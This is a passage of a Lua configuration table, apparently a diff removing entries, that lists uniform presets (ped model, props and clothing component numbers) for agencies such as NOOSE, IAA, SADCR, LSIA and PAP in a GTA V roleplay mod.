1 }, - { 11, 4, 1 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 16, 1 }, - { 4, 11, 5 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 23, 2 }, - { 5, 1, 1 }, - } - }, - ['Female PIA Special Agent'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 28, 2 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 4, 5 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 25, 2 }, - { 5, 1, 1 }, - } - }, - ['Male PIA Field Agent'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 6 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 52, 3 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 53, 4 }, - { 6, 26, 1 }, - { 7, 7, 1 }, - { 9, 23, 2 }, - { 5, 49, 1 }, - } - }, - ['Female PIA Field Agent'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 15, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 55, 4 }, - { 6, 25, 1 }, - { 7, 7, 1 }, - { 9, 25, 2 }, - { 5, 1, 1 }, - } - }, - ['Male PIA Windbreaker'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 37, 4 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 29, 4 }, - { 4, 50, 4 }, - { 6, 55, 1 }, - { 7, 7, 1 }, - { 9, 23, 2 }, - { 5, 1, 1 }, - } - }, - ['Female PIA Windbreaker'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 169, 4 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 3 }, - { 4, 4, 5 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 21, 6 }, - { 5, 1, 1 }, - } - }, - ['Male PIA Agent Winter'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 4 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 231, 7 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 12, 1 }, - { 4, 11, 5 }, - { 6, 72, 5 }, - { 7, 1, 1 }, - { 9, 23, 2 }, - { 5, 67, 1 }, - } - }, - ['Female PIA Agent Winter'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 165, 4 }, - { 3, 45, 1 }, - { 10, 1, 1 }, - { 8, 40, 3 }, - { 4, 4, 5 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 25, 2 }, - { 5, 67, 1 }, - } - }, - ['Male PIA Class A'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 11 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 36, 1 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 36, 1 }, - } - }, - ['Male PIA Class B'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 11 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 88, 13 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 36, 1 }, - } - }, - ['Male PIA Class C'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 11 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 87, 13 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 36, 1 }, - } - }, - ['Female PIA Class A'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 11 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 35, 1 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 36, 1 }, - } - }, - ['Female PIA Class B'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 11 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 91, 13 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 36, 1 }, - } - }, - ['Female PIA Class C'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 11 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 91, 13 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 36, 1 }, - } - }, - ['Male Border Patrol Class C'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 98, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 88, 11 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male Border Patrol Class B'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 99, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 88, 11 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female Border Patrol Class B'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 90, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 91, 11 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female Border Patrol Class C'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 89, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 91, 11 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male NOOSE TRU Uniform'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 76, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 54, 1 }, - { 3, 97, 1 }, - { 10, 6, 1 }, - { 8, 16, 1 }, - { 4, 38, 1 }, - { 6, 26, 1 }, - { 7, 111, 1 }, - { 9, 17, 3 }, - { 5, 49, 1 }, - } - }, - ['Female NOOSE TRU Uniform'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 75, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 47, 1 }, - { 3, 112, 1 }, - { 10, 6, 1 }, - { 8, 16, 1 }, - { 4, 37, 1 }, - { 6, 26, 1 }, - { 7, 82, 1 }, - { 9, 19, 3 }, - { 5, 49, 1 }, - } - }, - ['Male Juggernaut'] = { - category = 'NOOSE', - ped = 'mp_m_freemode_01', - props = { - { 0, 94, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 187, 1 }, - { 3, 111, 4 }, - { 10, 1, 1 }, - { 8, 98, 1 }, - { 4, 85, 1 }, - { 6, 14, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female Juggernaut'] = { - category = 'NOOSE', - ped = 'mp_f_freemode_01', - props = { - { 0, 93, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 189, 1 }, - { 3, 128, 4 }, - { 10, 1, 1 }, - { 8, 106, 1 }, - { 4, 87, 1 }, - { 6, 35, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male IAA Field Agent'] = { - category = 'IAA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 243, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 11, 4 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 23, 9 }, - { 5, 1, 1 }, - } - }, - ['Female IAA Field Agent'] = { - category = 'IAA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 15, 2 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 10, 1 }, - { 4, 4, 2 }, - { 6, 51, 1 }, - { 7, 99, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male IAA Agent'] = { - category = 'IAA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 5 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 17, 1 }, - { 4, 11, 3 }, - { 6, 11, 1 }, - { 7, 1, 1 }, - { 9, 23, 9 }, - { 5, 1, 1 }, - } - }, - ['Male IAA Suit'] = { - category = 'IAA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 5, 12 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 12, 5 }, - { 4, 11, 3 }, - { 6, 11, 1 }, - { 7, 14, 1 }, - { 9, 23, 9 }, - { 5, 1, 1 }, - } - }, - ['Female IAA Suit'] = { - category = 'IAA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 25, 2 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 13 }, - { 4, 4, 2 }, - { 6, 51, 1 }, - { 7, 1, 1 }, - { 9, 21, 10 }, - { 5, 67, 1 }, - } - }, - ['Male IAA Agent Winter'] = { - category = 'IAA', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 168, 4 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 29, 16 }, - { 4, 11, 4 }, - { 6, 72, 2 }, - { 7, 1, 1 }, - { 9, 23, 9 }, - { 5, 67, 1 }, - } - }, - ['Female IAA Agent Winter'] = { - category = 'IAA', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 165, 4 }, - { 3, 45, 1 }, - { 10, 1, 1 }, - { 8, 24, 2 }, - { 4, 4, 5 }, - { 6, 26, 1 }, - { 7, 99, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male USAF Police'] = { - category = 'USAF Military Police', - ped = 'mp_m_freemode_01', - props = { - { 0, 29, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 64, 1 }, - { 3, 1, 1 }, - { 10, 22, 1 }, - { 8, 56, 1 }, - { 4, 88, 2 }, - { 6, 36, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female USAF Police'] = { - category = 'USAF Military Police', - ped = 'mp_f_freemode_01', - props = { - { 0, 29, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 57, 1 }, - { 3, 15, 1 }, - { 10, 21, 1 }, - { 8, 33, 1 }, - { 4, 91, 2 }, - { 6, 37, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male SADCR Class A'] = { - category = 'SADCR', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 10 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 26, 3 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 34, 1 }, - } - }, - ['Male SADCR Class B'] = { - category = 'SADCR', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 10 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 87, 11 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 14, 1 }, - { 5, 34, 1 }, - } - }, - ['Male SADCR Class C'] = { - category = 'SADCR', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 10 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 87, 11 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 14, 1 }, - { 5, 34, 1 }, - } - }, - ['Male SADCR Jumpsuit'] = { - category = 'SADCR', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 82, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 45, 2 }, - { 4, 88, 11 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Male SADCR CRT'] = { - category = 'SADCR', - ped = 'mp_m_freemode_01', - props = { - { 0, 126, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 82, 1 }, - { 3, 18, 1 }, - { 10, 1, 1 }, - { 8, 45, 2 }, - { 4, 88, 11 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 12, 3 }, - { 5, 49, 1 }, - } - }, - ['Female SADCR Class A'] = { - category = 'SADCR', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 10 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 42, 1 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 34, 1 }, - } - }, - ['Female SADCR Class B'] = { - category = 'SADCR', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 10 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 90, 11 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 34, 1 }, - } - }, - ['Female SADCR Class C'] = { - category = 'SADCR', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 10 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 90, 11 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 34, 1 }, - } - }, - ['Female SADCR Jumpsuit'] = { - category = 'SADCR', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 41, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 53, 2 }, - { 4, 91, 11 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female SADCR CRT'] = { - category = 'SADCR', - ped = 'mp_f_freemode_01', - props = { - { 0, 125, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 53, 1 }, - { 11, 41, 1 }, - { 3, 19, 1 }, - { 10, 1, 1 }, - { 8, 53, 2 }, - { 4, 91, 11 }, - { 6, 25, 1 }, - { 7, 1, 1 }, - { 9, 11, 3 }, - { 5, 49, 1 }, - } - }, - ['Male LSIA Class A'] = { - category = 'LSIA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 8 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 32, 1 }, - } - }, - ['Male LSIA Class B'] = { - category = 'LSIA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 8 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 32, 1 }, - } - }, - ['Male LSIA Class C'] = { - category = 'LSIA', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 8 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 32, 1 }, - } - }, - ['Female LSIA Class A'] = { - category = 'LSIA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 8 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 32, 1 }, - } - }, - ['Female LSIA Class B'] = { - category = 'LSIA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 8 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 32, 1 }, - } - }, - ['Female LSIA Class C'] = { - category = 'LSIA', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 8 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 32, 1 }, - } - }, - ['Male LSIA Winter Uniform'] = { - category = 'LSIA', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 124, 1 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 27, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSIA Winter Uniform'] = { - category = 'LSIA', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 120, 1 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 29, 1 }, - { 5, 49, 1 }, - } - }, - ['Male PAP Class A'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 9 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Male PAP Class B'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 9 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 33, 1 }, - } - }, - ['Male PAP Class C'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 9 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 36, 1 }, - { 6, 52, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 33, 1 }, - } - }, - ['Female PAP Class A'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 9 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Female PAP Class B'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 9 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Female PAP Class C'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 9 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 35, 1 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Male PAP Motorcycle Class A'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 49, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 9 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 33, 2 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Male PAP Motorcycle Class B'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 49, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 9 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 33, 2 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Male PAP Motorcycle Class C'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 49, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 9 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 57, 1 }, - { 4, 33, 2 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Female PAP Motorcycle Class A'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 49, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 9 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 32, 2 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Female PAP Motorcycle Class B'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 49, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 9 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 32, 2 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Female PAP Motorcycle Class C'] = { - category = 'PAP', - ped = 'mp_f_freemode_01', - props = { - { 0, 49, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 9 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 34, 1 }, - { 4, 32, 2 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 33, 1 }, - } - }, - ['Male PAP Harbor Class B'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 9 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 88, 13 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 26, 2 }, - { 5, 33, 1 }, - } - }, - ['Male PAP Harbor Class C'] = { - category = 'PAP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 8 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - 